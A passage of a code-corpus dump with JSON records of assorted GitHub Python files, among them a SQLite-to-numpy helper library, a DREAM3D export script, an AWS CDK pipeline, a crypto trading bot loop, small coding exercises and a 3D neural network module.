torch.load(path)\n except:\n print(path)\n continue\n for w, v in zip(toks, tok_vecs.split(1, 1)):\n if w == config.lookup_word:\n vecs.append(v)\n torch.save(vecs, f\"{config.lookup_word}-vecs.pt\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"castorini/d-bert","sub_path":"dbert/distill/run/read_vectors.py","file_name":"read_vectors.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"32"} +{"seq_id":"39191417775","text":"#!/usr/bin/python3\n\"\"\"find island perimeter\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"Returns the correct perimeter value for the given example grid.\"\"\"\n count = 0\n rows, cols = len(grid), len(grid[0])\n\n for column in range(rows):\n for row in range(cols):\n if grid[column][row] == 1:\n # Check up\n if column - 1 < 0 or grid[column - 1][row] == 0:\n count += 1\n\n # Check down\n if column + 1 >= rows or grid[column + 1][row] == 0:\n count += 1\n\n # Check right\n if row + 1 >= cols or grid[column][row + 1] == 0:\n count += 1\n\n # Check left\n if row - 1 < 0 or grid[column][row - 1] == 0:\n count += 1\n\n return count\n","repo_name":"fedy69/holbertonschool-interview","sub_path":"0x1C-island_perimeter/0-island_perimeter.py","file_name":"0-island_perimeter.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30351052882","text":"import numpy\nfrom csv import reader, writer\nfrom collections import defaultdict\nimport gzip\n\ndef _csv_datatype(value):\n try:\n value = int(value)\n return 'int'\n except:\n try:\n value = float(value)\n return 'real'\n except:\n return 'string'\n\n_np_datatype = defaultdict(lambda: 'string')\n_np_datatype[numpy.dtype('float32').str] = 'real'\n_np_datatype[numpy.dtype('float64').str] = 'real'\n_np_datatype[numpy.dtype('int32').str] = 'int'\n_np_datatype[numpy.dtype('int64').str] = 'int'\n\n_np_convert = defaultdict(lambda: str)\n_np_convert[numpy.dtype('float32').str] = float\n_np_convert[numpy.dtype('float64').str] = float\n_np_convert[numpy.dtype('int32').str] = int\n_np_convert[numpy.dtype('int64').str] = int\n\ndef _validate(conn, query, dtypes):\n cursor = conn.cursor()\n cursor.execute(query)\n row = cursor.fetchone()\n if row is None:\n raise ValueError('empty query result')\n if not (dtypes is None) and len(dtypes) != len(row):\n raise ValueError('the length of dtypes needs to be the same as the number of columns')\n return row, cursor, [i[0] for i in cursor.description]\n\ndef columnnames(conn, query):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the names of the columns from a SQL\n `query` on `conn` as a list of strings.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param query: A SQL query on the database in `conn`\n :type query: str\n\n :return: A list of column names\n :rtype: List[str]\n \"\"\"\n row, cursor, names = _validate(conn, query, None)\n\n return names\n\ndef columnnamestypes(conn, query):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the names and numpy data types of\n the columns from a SQL `query` on `conn` as a list of 2-tuples with strings.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param query: A SQL query on the database in `conn`\n :type query: str\n\n :return: A list of tuples with column names and numpy data types\n :rtype: List[Tuple[str,str]]\n \"\"\"\n row, cursor, names = _validate(conn, query, None)\n\n return [(n, t) for n, t in \\\n zip(names, [numpy.array([i]).dtype.str for i in row])]\n\ndef tableschema(conn, table):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the names and database data types of\n the columns for a `table` in `conn` as a list of 2-tuples with strings.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param table: A SQL table on the database in `conn`\n :type table: str\n\n :return: A list of tuples with column names and SQLite data types\n :rtype: List[Tuple[str,str]]\n \"\"\"\n return \\\n [(i[1], i[2].lower()) for i in \\\n conn.execute(\"pragma table_info(%s)\" % table).fetchall()]\n\ndef tablenames(conn):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the names of the tables in `conn` as\n a list of strings.\n\n *Note*: Likely only works with SQLite3 since it queries the `sqlite_schema`\n table for the list of tables.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :return: A list of table names\n :rtype: List[str]\n \"\"\"\n return [i[0] for i in conn.execute(\n \"select name from sqlite_schema where type='table' and name not like 'sqlite_%'\")]\n\ndef query2colarr(conn, query, dtypes=None):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the data from a SQL `query` as\n a list of numpy arrays in column order.\n\n *colarr* refers to \"column arrays,\" i.e., not row-oriented. `dtypes` is\n None to have numpy infer the data types for each column, or a list of numpy\n data types or None to specify the data type for each column (or infer the\n type with None).\n\n Indexing the data is [column] or [column][row], where column is the column\n index as an integer ordinal from and including 0. row is array integer\n index.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param query: A SQL query on the database in `conn`\n :type query: str\n\n :param dtypes: None or a list of numpy data types or None\n :type dtypes: Union[None,List[Union[numpy.dtype,None]]] = None\n\n :return: A list of numpy arrays representing the query as column data\n :rtype: List[numpy.array]\n \"\"\"\n\n row, cursor, names = _validate(conn, query, dtypes)\n if dtypes is None:\n dtypes = [None]*len(row)\n\n columns = [[i] for i in row]\n for row in cursor:\n for i, c in zip(row, columns):\n c.append(i)\n return [numpy.array(c, d) for c, d in zip(columns, dtypes)]\n\ndef query2coldict(conn, query, dtypes=None):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the data from a SQL `query` as\n a dictionary of column name to numpy array.\n\n *coldict* refers to \"column dictionary,\" i.e., not row-oriented. `dtypes`\n is None to have numpy infer the data types for each column, or a list of\n numpy data types or None to specify the data type for each column (or infer\n the type with None).\n\n Indexing the data is [column] or [column][row], where column is the column\n index as the column name. row is array integer index.\n\n *Note:* if the query has duplicate column names, like `select x, x from\n a_table`, the dictionary will only have the right-most column data with\n that name. This can be fixed by using a renaming a column in the query with\n \"as,\" like `select x, x as y from a_table`.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param query: A SQL query on the database in `conn`\n :type query: str\n\n :param dtypes: None or a list of numpy data types or None\n :type dtypes: Union[None,List[Union[numpy.dtype,None]]] = None\n\n :return: A dictionary of column name to numpy arrays representing the\n query as column data\n :rtype: Dict[str,numpy.array]\n \"\"\"\n\n row, cursor, names = _validate(conn, query, dtypes)\n if dtypes is None:\n dtypes = [None]*len(row)\n\n columns = [[i] for i in row]\n for row in cursor:\n for i, c in zip(row, columns):\n c.append(i)\n return {n: numpy.array(c, d) for c, n, d in zip(columns, names, dtypes)}\n\ndef query2array(conn, query, dtype=None):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the data from a SQL `query` as\n a 2D numpy array with a single data type.\n\n `dtype` is None to have numpy infer the data type for the entire array,\n or a numpy data type to specify the data type for the array.\n\n Indexing the data is [row], [row][column], [row, column], or [:,column],\n using numpy indexing rules. Indices are integers.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param query: A SQL query on the database in `conn`\n :type query: str\n\n :param dtype: None or a numpy data type\n :type dtypes: Union[numpy.dtype,None] = None\n\n :return: A 2D numpy array with a single data type\n :rtype: 2D numpy.array\n \"\"\"\n\n row, cursor, names = _validate(conn, query, None)\n\n rows = [row]\n for row in cursor:\n rows.append(row)\n return numpy.array(rows, dtype)\n\ndef query2struct(conn, query, dtypes):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, return the data from a SQL `query` as\n a 2D numpy structured array.\n\n `dtypes` is a list of numpy data types to specify the data type for each\n column. Structured arrays cannot infer data types and will try to cast\n everything to floating point, therefore we have to specify the types\n for each column.\n\n Indexing the data is [row], [row][column], or [column_name], using numpy\n indexing rules. Indices are integers, except for column_name indexing,\n which are strings.\n\n *Note:* if the query cannot have duplicate column names, like `select x, x\n from a_table`. This can be fixed by using a renaming a column in the query\n with \"as,\" like `select x, x as y from a_table`.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param query: A SQL query on the database in `conn`\n :type query: str\n\n :param dtypes: A list of numpy data types\n :type dtypes: List[numpy.dtype]\n\n :return: A 1D structured numpy array with data types for each column\n :rtype: 1D structured numpy.array\n \"\"\"\n\n row, cursor, names = _validate(conn, query, dtypes)\n if dtypes is None:\n dtypes = [None]*len(row)\n\n rows = [row]\n for row in cursor:\n rows.append(row)\n return numpy.array(rows, [(n, d) for n, d in zip(names, dtypes)])\n\ndef query2csv(conn, query, filename, header_skip=False, csv_options={},\n encoding='utf-8'):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, write the data from a SQL `query` into\n a CSV file named `filename`.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param query: A SQL query on the database in `conn`\n :type query: str\n\n :param filename: The filename to write the CSV data to\n :type filename: str\n\n :param header_skip: If True, skip writing the header into the CSV\n :type header_skip: bool = False\n\n :param csv_options: Keyword arguments to pass to the CSV writer\n :type csv_options: Dict[str,Any] = {}\n\n :param encoding: Encoding of the CSV file\n :type encoding: str = 'utf-8'\n\n :return: None\n :rtype: None\n \"\"\"\n\n row, cursor, names = _validate(conn, query, None)\n\n columns = [[i] for i in row]\n for row in cursor:\n for i, c in zip(row, columns):\n c.append(i)\n\n f = open(filename, 'w', encoding=encoding)\n w = writer(f, **csv_options)\n if not header_skip:\n w.writerow(names)\n for row in zip(*columns):\n w.writerow(row)\n f.close()\n\ndef csv2sqlite(conn, table, filename, header_skip=False,\n csv_options={}, encoding='utf-8', header=None, gzipped=False):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, inject the data from a CSV `filename` into\n the database with the `table` name.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param table: A SQL table on the database in `conn`\n :type table: str\n\n :param filename: The filename to read the CSV data from\n :type filename: str\n\n :param header_skip: If True, skip reading a header from the CSV; if\n `header_skip` is True, `header` cannot be None\n :type header_skip: bool = False\n\n :param csv_options: Keyword arguments to pass to the CSV reader\n :type csv_options: Dict[str,Any] = {}\n\n :param encoding: Encoding of the CSV file\n :type encoding: str = 'utf-8'\n\n :param header: If None, uses the first line from the CSV to determine\n column names; else, a list of column names. Must be a list of column\n names if `header_skip` is True\n :type header: Union[None,List[str]]\n\n :return: A list of 2-tuples of column names and SQL data types\n :rtype: List[Tuple[str,str]]\n \"\"\"\n\n if gzipped:\n f = gzip.open(filename, 'rt', encoding=encoding)\n else:\n f = open(filename, 'r', encoding=encoding)\n r = reader(f, **csv_options)\n\n if header_skip:\n if header is None:\n raise ValueError('header cannot be None when header_skip is True')\n columns = header\n else:\n if header is None:\n columns = next(r)\n else:\n next(r)\n columns = header\n row = next(r)\n types = [_csv_datatype(i) for i in row]\n\n cursor = conn.cursor()\n columnstr = \"\"\n insertstr = \"insert into '%s' values (?\" % table\n columnstr = \"'%s' %s\" % (columns[0], types[0])\n for n, t in zip(columns[1:], types[1:]):\n columnstr = columnstr + \", '%s' %s\" % (n, t)\n insertstr = insertstr + \", ?\"\n insertstr = insertstr + \")\"\n cursor.execute(\"create table '%s' (%s)\" % (table, columnstr))\n cursor.execute(insertstr, row)\n for row in r:\n cursor.execute(insertstr, row)\n conn.commit()\n f.close()\n\n return list(zip(columns, types))\n\ndef columns2sqlite(conn, table, columns, header):\n \"\"\"\n Given a SQL DB-API 2.0, `conn`, inject the data from column arrays or\n dictionary arrays into the database with the `table` name.\n\n :param conn: A database connection object\n :type conn: SQL DB-API 2.0 object\n\n :param table: A SQL table on the database in `conn`\n :type table: str\n\n :param columns: A list of iterables (similar data returned by query2colarr),\n or a dictionary of column name to iterables (similar data returned by\n query2coldict)\n :type columns: Union[List[Iterable],Dict[str,Iterable]]\n\n :param header: If `columns` is a list of iterables, then `header` is\n a list of 2-tuples of column name and column index; else a list of\n column names (since `header` is a dictionary of column names to\n iterables)\n :type header: Union[List[Tuple[str,int],List[str]]]\n\n :return: A list of 2-tuples of column names and SQL data types\n :rtype: List[Tuple[str,str]]\n \"\"\"\n\n if isinstance(header[0], tuple):\n names = [i[0] for i in header]\n idx = [i[1] for i in header]\n else:\n idx = header\n names = header\n columns = {i: numpy.array(columns[i]) for i in idx}\n types = [_np_datatype[columns[i].dtype.str] for i in idx]\n conv = [_np_convert[columns[i].dtype.str] for i in idx]\n\n cursor = conn.cursor()\n columnstr = \"\"\n insertstr = \"insert into '%s' values (?\" % table\n columnstr = \"'%s' %s\" % (names[0], types[0])\n for n, t in zip(names[1:], types[1:]):\n columnstr = columnstr + \", '%s' %s\" % (n, t)\n insertstr = insertstr + \", ?\"\n insertstr = insertstr + \")\"\n cursor.execute(\"create table '%s' (%s)\" % (table, columnstr))\n for row in zip(*[columns[i] for i in idx]):\n cursor.execute(insertstr, [c(v) for c, v in zip(conv, row)])\n conn.commit()\n\n return list(zip(names, types))\n","repo_name":"jonwoodring/sqlitenumpy","sub_path":"sqlitenumpy.py","file_name":"sqlitenumpy.py","file_ext":"py","file_size_in_byte":13943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29966471477","text":"\ndef split(number):\n list = []\n result = 1\n while 1:\n if number-3>1:\n number -=3\n list.append(3)\n else:\n list.append(number)\n break\n for i in list:\n result = result * i\n return result\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"XjgoXNmnz59txiQp3_7.py","file_name":"XjgoXNmnz59txiQp3_7.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25361525133","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\n\nimport h5py\nimport numpy as np\n\nimport damask\n\nclass AttributeManagerNullterm(h5py.AttributeManager):\n \"\"\"\n Attribute management for DREAM.3D hdf5 files.\n\n String attribute values are stored as fixed-length string with NULLTERM\n\n References\n ----------\n https://stackoverflow.com/questions/38267076\n https://stackoverflow.com/questions/52750232\n\n \"\"\"\n\n def create(self, name, data, shape=None, dtype=None):\n if isinstance(data,str):\n tid = h5py.h5t.C_S1.copy()\n tid.set_size(len(data + ' '))\n super().create(name=name,data=data+' ',dtype = h5py.Datatype(tid))\n else:\n super().create(name=name,data=data,shape=shape,dtype=dtype)\n\n\nh5py._hl.attrs.AttributeManager = AttributeManagerNullterm # 'Monkey patch'\n\n\n# --------------------------------------------------------------------\n# Crystal structure specifications\n# --------------------------------------------------------------------\nCrystal_structures = {'fcc': 1,\n 'bcc': 1,\n 'hcp': 0,\n 'bct': 7,\n 'ort': 6} #TODO: is bct Tetragonal low/Tetragonal high?\nPhase_types = {'Primary': 0} #further additions to these can be done by looking at 'Create Ensemble Info' filter\n\n\n# --------------------------------------------------------------------\n# MAIN\n# --------------------------------------------------------------------\nparser = argparse.ArgumentParser(description='Creating a file for DREAM3D from DAMASK data')\nparser.add_argument('filenames', nargs='+',\n help='DADF5 files')\nparser.add_argument('-d','--dir', dest='dir',default='postProc',metavar='string',\n help='name of subdirectory relative to the location of the DADF5 file to hold output')\nparser.add_argument('--inc',nargs='+',\n help='Increment for which DREAM3D to be used, eg. 25',type=int)\n\noptions = parser.parse_args()\n\nfor filename in options.filenames:\n f = damask.Result(filename)\n N_digits = int(np.floor(np.log10(int(f.increments[-1][3:]))))+1\n\n f.pick('increments',options.inc)\n for inc in damask.util.show_progress(f.iterate('increments'),len(f.selection['increments'])):\n dirname = os.path.abspath(os.path.join(os.path.dirname(filename),options.dir))\n try:\n os.mkdir(dirname)\n except FileExistsError:\n pass\n\n o = h5py.File(dirname + '/' + os.path.splitext(filename)[0] \\\n + '_inc_{}.dream3D'.format(inc[3:].zfill(N_digits)),'w')\n o.attrs['DADF5toDREAM3D'] = '1.0'\n o.attrs['FileVersion'] = '7.0'\n\n for g in ['DataContainerBundles','Pipeline']: # empty groups (needed)\n o.create_group(g)\n\n data_container_label = 'DataContainers/ImageDataContainer'\n cell_data_label = data_container_label + '/CellData'\n\n # Phase information of DREAM.3D is constituent ID in DAMASK\n o[cell_data_label + '/Phases'] = f.get_constituent_ID().reshape(tuple(f.grid)+(1,))\n DAMASK_quaternion = f.read_dataset(f.get_dataset_location('orientation'))\n # Convert: DAMASK uses P = -1, DREAM.3D uses P = +1. Also change position of imagninary part\n DREAM_3D_quaternion = np.hstack((-DAMASK_quaternion['x'],-DAMASK_quaternion['y'],-DAMASK_quaternion['z'],\n DAMASK_quaternion['w'])).astype(np.float32)\n o[cell_data_label + '/Quats'] = DREAM_3D_quaternion.reshape(tuple(f.grid)+(4,))\n\n # Attributes to CellData group\n o[cell_data_label].attrs['AttributeMatrixType'] = np.array([3],np.uint32)\n o[cell_data_label].attrs['TupleDimensions'] = f.grid.astype(np.uint64)\n\n # Common Attributes for groups in CellData\n for group in ['/Phases','/Quats']:\n o[cell_data_label + group].attrs['DataArrayVersion'] = np.array([2],np.int32)\n o[cell_data_label + group].attrs['Tuple Axis Dimensions'] = 'x={},y={},z={}'.format(*f.grid)\n\n o[cell_data_label + '/Phases'].attrs['ComponentDimensions'] = np.array([1],np.uint64)\n o[cell_data_label + '/Phases'].attrs['ObjectType'] = 'DataArray'\n o[cell_data_label + '/Phases'].attrs['TupleDimensions'] = f.grid.astype(np.uint64)\n\n o[cell_data_label + '/Quats'].attrs['ComponentDimensions'] = np.array([4],np.uint64)\n o[cell_data_label + '/Quats'].attrs['ObjectType'] = 'DataArray'\n o[cell_data_label + '/Quats'].attrs['TupleDimensions'] = f.grid.astype(np.uint64)\n\n # Create EnsembleAttributeMatrix\n ensemble_label = data_container_label + '/EnsembleAttributeMatrix'\n\n # Data CrystalStructures\n o[ensemble_label + '/CrystalStructures'] = np.uint32(np.array([999,\\\n Crystal_structures[f.get_crystal_structure()]])).reshape(2,1)\n o[ensemble_label + '/PhaseTypes'] = np.uint32(np.array([999,Phase_types['Primary']])).reshape(2,1) # ToDo\n\n # Attributes Ensemble Matrix\n o[ensemble_label].attrs['AttributeMatrixType'] = np.array([11],np.uint32)\n o[ensemble_label].attrs['TupleDimensions'] = np.array([2], np.uint64)\n\n # Attributes for data in Ensemble matrix\n for group in ['CrystalStructures','PhaseTypes']: # 'PhaseName' not required MD: But would be nice to take the phase name mapping\n o[ensemble_label+'/'+group].attrs['ComponentDimensions'] = np.array([1],np.uint64)\n o[ensemble_label+'/'+group].attrs['Tuple Axis Dimensions'] = 'x=2'\n o[ensemble_label+'/'+group].attrs['DataArrayVersion'] = np.array([2],np.int32)\n o[ensemble_label+'/'+group].attrs['ObjectType'] = 'DataArray'\n o[ensemble_label+'/'+group].attrs['TupleDimensions'] = np.array([2],np.uint64)\n\n geom_label = data_container_label + '/_SIMPL_GEOMETRY'\n\n o[geom_label + '/DIMENSIONS'] = np.int64(f.grid)\n o[geom_label + '/ORIGIN'] = np.float32(np.zeros(3))\n o[geom_label + '/SPACING'] = np.float32(f.size)\n\n o[geom_label].attrs['GeometryName'] = 'ImageGeometry'\n o[geom_label].attrs['GeometryTypeName'] = 'ImageGeometry'\n o[geom_label].attrs['GeometryType'] = np.array([0],np.uint32)\n o[geom_label].attrs['SpatialDimensionality'] = np.array([3],np.uint32)\n o[geom_label].attrs['UnitDimensionality'] = np.array([3],np.uint32)\n","repo_name":"eisenforschung/DAMASK","sub_path":"processing/legacy/DADF5toDREAM3D.py","file_name":"DADF5toDREAM3D.py","file_ext":"py","file_size_in_byte":6539,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"32"} +{"seq_id":"5993315400","text":"from aws_cdk import (\n aws_codepipeline,\n aws_codepipeline_actions,\n aws_ssm,\n App, CfnOutput, Stack, Aspects\n)\nimport cdk_nag\n\nclass Pipeline(Stack):\n def __init__(self, app: App, id: str, props, **kwargs) -> None:\n super().__init__(app, id, **kwargs)\n # define the s3 artifact\n source_output = aws_codepipeline.Artifact(artifact_name='source')\n # define the pipeline\n pipeline = aws_codepipeline.Pipeline(\n self, \"Pipeline\",\n pipeline_name=f\"{props['namespace']}\",\n artifact_bucket=props['bucket'],\n stages=[\n aws_codepipeline.StageProps(\n stage_name='Source',\n actions=[\n aws_codepipeline_actions.S3SourceAction(\n bucket=props['bucket'],\n bucket_key='source.zip',\n action_name='S3Source',\n run_order=1,\n output=source_output,\n trigger=aws_codepipeline_actions.S3Trigger.POLL\n ),\n ]\n ),\n aws_codepipeline.StageProps(\n stage_name='Build',\n actions=[\n aws_codepipeline_actions.CodeBuildAction(\n action_name='DockerBuildImages',\n input=source_output,\n project=props['cb_docker_build'],\n run_order=1,\n )\n ]\n )\n ]\n\n )\n # give pipelinerole read write to the bucket\n props['bucket'].grant_read_write(pipeline.role)\n\n #pipeline param to get the\n pipeline_param = aws_ssm.StringParameter(\n self, \"PipelineParam\",\n parameter_name=f\"{props['namespace']}-pipeline\",\n string_value=pipeline.pipeline_name,\n description='cdk pipeline bucket'\n )\n # cfn output\n CfnOutput(\n self, \"PipelineOut\",\n description=\"Pipeline\",\n value=pipeline.pipeline_name\n )\n\n # Security Scan\n Aspects.of(self).add(cdk_nag.AwsSolutionsChecks())\n\n\n cdk_nag.NagSuppressions.add_stack_suppressions(self, [\n {\"id\":\"AwsSolutions-IAM5\", \"reason\": \"ERROR: The IAM user, role, or group uses AWS managed policies. An AWS managed policy is a standalone policy that is created and admini stered by AWS. Currently, many AWS managed policies do not restrict resource scope. Repla ce AWS managed policies with system specific (customer) managed policies. This is a granu lar rule that returns individual findings that can be suppressed with appliesTo. The find ings are in the format Policy:: for AWS managed policies. Example: appliesTo: ['P olicy::arn::iam::aws:policy/foo']\"},\n ])\n","repo_name":"joejimenezb/public_projects","sub_path":"ab_demo/DockerBuild/Pipeline.py","file_name":"Pipeline.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37106457774","text":"from itertools import permutations\nn=int(input())\nsign=list(input().strip().split())\nnum=[i for i in range(10)]\ncase=list(permutations(num,n+1))\nmin_num=10**10\nmax_num=0\nnext=False\nfor i in range(len(case)):\n flag=True\n for j in range(1,n+1):\n if sign[j-1]==\"<\":\n if case[i][j-1]>case[i][j]:\n flag=False\n break\n else:\n if case[i][j-1] Callable[[], str]:\n test_data_gen: Generator[str, None, None] = (line for line in test_data)\n\n def generate_input() -> str:\n return next(test_data_gen)\n return generate_input\n\n\ndef solution():\n racers: Dict[str, int] = {r: int() for r in input().split(', ')}\n while True:\n lin: str = input()\n if lin == 'end of race':\n break\n racer: str = ''.join(re.findall(r\"[a-zA-Z]\", lin))\n distance: int = sum([int(n) for n in re.findall(r\"[0-9]\", lin)])\n if DEBUG:\n print(racer, distance)\n if racer in racers:\n racers[racer] += distance\n racers_list: List[Dict[str, int]] = sorted(racers.items(), key=lambda i: i[1], reverse=True)\n try:\n print(f\"1st place: {racers_list[0][0]}\")\n print(f\"2nd place: {racers_list[1][0]}\")\n print(f\"3rd place: {racers_list[2][0]}\")\n except KeyError as _:\n pass\n\n\nif DEBUG:\n for test_run in TEST_RUNS:\n input: Callable[[], str] = get_run_generator(test_run)\n solution()\nelse:\n solution()\n","repo_name":"sleepychild/SoftUni_SE","sub_path":"FUNDAMENTALS_MODULE/Regular_Expressions/MORE/01_Race.py","file_name":"01_Race.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23475001140","text":"'''\nTask 3\nExtracting numbers.\n\nMake a list that contains all integers from 1 to 100, then find all integers from the list that are divisible by 7 but not a multiple of 5,\nand store them in a separate list. Finally, print the list.\nConstraint: use only while loop for iteration\n'''\n\nlist_1_to_100 = list(range(0, 100))\nlist_special_numbers = []\ni = 0\n\nwhile i < len(list_1_to_100):\n if list_1_to_100[i] % 7 == 0 and list_1_to_100[i] % 5 != 0:\n list_special_numbers.append(list_1_to_100[i])\n i += 1\n\n\nprint(f'\\nThe following numbers in the range from 1 to 100 are divisible by 7 but not a multiple of 5:\\n{list_special_numbers}')\n\n\n\n\n\n\n\n","repo_name":"RealHomoBulla/Beetroot_Academy_Homeworks","sub_path":"Lesson_05/Lesson_5_Task_3.py","file_name":"Lesson_5_Task_3.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"22150733149","text":"from constants import ABORT_ALL_POSITIONS, FIND_COINTEGRATED, PLACE_TRADES, MANAGE_EXITS\nfrom func_connections import connect_dydx\nfrom func_private import abort_all_positions\nfrom func_public import construct_market_prices\nfrom func_cointegration import store_cointegration_results\nfrom func_entry_pairs import open_positions\nfrom func_exit_pairs import manage_trade_exits\nfrom func_messaging import send_message\n\n\n# MAIN FUNCTION\nif __name__ == \"__main__\":\n\n # Message on start\n send_message(\"Bot launch successful\")\n\n # Connect to client\n try:\n print(\"Connecting to Client...\")\n client = connect_dydx()\n except Exception as e:\n print(\"Error connecting to client: \", e)\n send_message(f\"Failed to connect to client {e}\")\n exit(1)\n\n # Abort all open positions\n if ABORT_ALL_POSITIONS:\n try:\n print(\"Closing all positions...\")\n close_orders = abort_all_positions(client)\n except Exception as e:\n print(\"Error closing all positions: \", e)\n send_message(f\"Error closing all positions {e}\")\n exit(1)\n\n # Find Cointegrated Pairs\n if FIND_COINTEGRATED:\n\n # Construct Market Prices\n try:\n print(\"Fetching market prices, please allow 3 mins...\")\n df_market_prices = construct_market_prices(client)\n except Exception as e:\n print(\"Error constructing market prices: \", e)\n send_message(f\"Error constructing market prices {e}\")\n exit(1)\n\n # Store Cointegrated Pairs\n try:\n print(\"Storing cointegrated pairs...\")\n stores_result = store_cointegration_results(df_market_prices)\n if stores_result != \"saved\":\n print(\"Error saving cointegrated pairs\")\n exit(1)\n except Exception as e:\n print(\"Error saving cointegrated pairs: \", e)\n send_message(f\"Error saving cointegrated pairs {e}\")\n exit(1)\n\n # Run as always on\n while True:\n\n # Place trades for opening positions\n if MANAGE_EXITS:\n try:\n print(\"Managing exits...\")\n manage_trade_exits(client)\n except Exception as e:\n print(\"Error managing exiting positions: \", e)\n send_message(f\"Error managing exiting positions {e}\")\n exit(1)\n\n # Place trades for opening positions\n if PLACE_TRADES:\n try:\n print(\"Finding trading opportunities...\")\n open_positions(client)\n except Exception as e:\n print(\"Error trading pairs: \", e)\n send_message(f\"Error opening trades {e}\")\n exit(1)\n","repo_name":"CryptoWizardsNet/dydx-trading-bot","sub_path":"program/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2455,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"32"} +{"seq_id":"71231503132","text":"import torch\nimport torch.nn as nn\n\n# # 定义注意力模块\n# class AttentionModule(nn.Module):\n# def __init__(self, input_channels):\n# super().__init__()\n# self.conv1 = nn.Conv3d(input_channels, input_channels // 4, kernel_size=1)\n# self.conv2 = nn.Conv3d(input_channels // 4, input_channels, kernel_size=1)\n# self.softmax = nn.Softmax(dim=1)\n#\n# def forward(self, x):\n# attention = self.conv2(nn.ReLU()(self.conv1(x)))\n# attention = self.softmax(attention)\n# out = x * attention\n# return out\n\n\n# 定义3D深度可分离特征提取模块\nclass My3DDepthwiseSeparableNet(nn.Module):\n def __init__(self,n_classes,n_channels):\n super(My3DDepthwiseSeparableNet, self).__init__()\n self.conv1 = nn.Conv3d(n_channels, 16, kernel_size=3, stride=1, padding=1) # 3D深度可分离卷积\n # self.attention = AttentionModule(3)\n self.conv2 = nn.Conv3d(3, 16, kernel_size=3, stride=1, padding=1)\n self.pool = nn.MaxPool3d(kernel_size=2, stride=2)\n self.tail2 = nn.Conv3d(16,n_classes, kernel_size = 3, stride = 1, padding = 1 )\n self.avpool = nn.AdaptiveAvgPool3d((1,1, 3))\n self.num_classes = n_classes\n\n def forward(self, x):\n x = self.conv1(x)\n x = nn.ReLU()(x)\n # x = self.attention(x)\n # x = self.conv2(x)\n # x = nn.ReLU()(x)\n # x = self.pool(x)\n # x = self.conv3(x)\n # x = nn.ReLU()(x)\n # x = self.pool(x)\n x = self.tail2(x)\n x = self.avpool(x).view(x.shape[0],self.num_classes,1,3)\n\n return x\n\n# # 定义多尺度特征融合模块\n# class MultiScaleFeatureFusion(nn.Module):\n# def __init__(self, input_channels, output_channels):\n# super().__init__()\n# self.conv1x1 = nn.Conv3d(input_channels, output_channels, kernel_size=1)\n# self.conv3x3 = nn.Conv3d(input_channels, output_channels, kernel_size=3, padding=1)\n# self.conv5x5 = nn.Conv3d(input_channels, output_channels, kernel_size=5, padding=2)\n#\n# def forward(self, x):\n# x1 = self.conv1x1(x)\n# x3 = self.conv3x3(x)\n# x5 = self.conv5x5(x)\n# out = torch.cat((x1, x3, x5), dim=1)\n# return out\n\nclass pointnet3d(nn.Module):\n def __init__(self,n_classes=3,n_channels=49):\n super().__init__()\n self.layer=nn.Sequential(\n #MultiScaleFeatureFusion(n_channels,n_classes),\n My3DDepthwiseSeparableNet(n_classes,n_channels)\n )\n\n def forward(self,x):\n x=self.layer(x)\n\n return x\n\n","repo_name":"yxz912/CT3Dpoints","sub_path":"models/Pointnet3d.py","file_name":"Pointnet3d.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29007658735","text":"import os\nimport time\nimport cv2 as cv\nimport numpy as np\nfrom tqdm import tqdm\nfrom PIL import Image\n\nimport torch\nfrom torchvision import transforms, datasets, utils\nfrom torch.utils.data import Dataset, DataLoader\n\nPATH = \"../data/flower_photos\"\nIMG_FORMAT = [\"jpg\", \"jpeg\", \"tif\", \"tiff\", \"bmp\", \"png\"]\n\ncategory_list = [i for i in os.listdir(PATH) if os.path.isdir(os.path.join(PATH, i)) 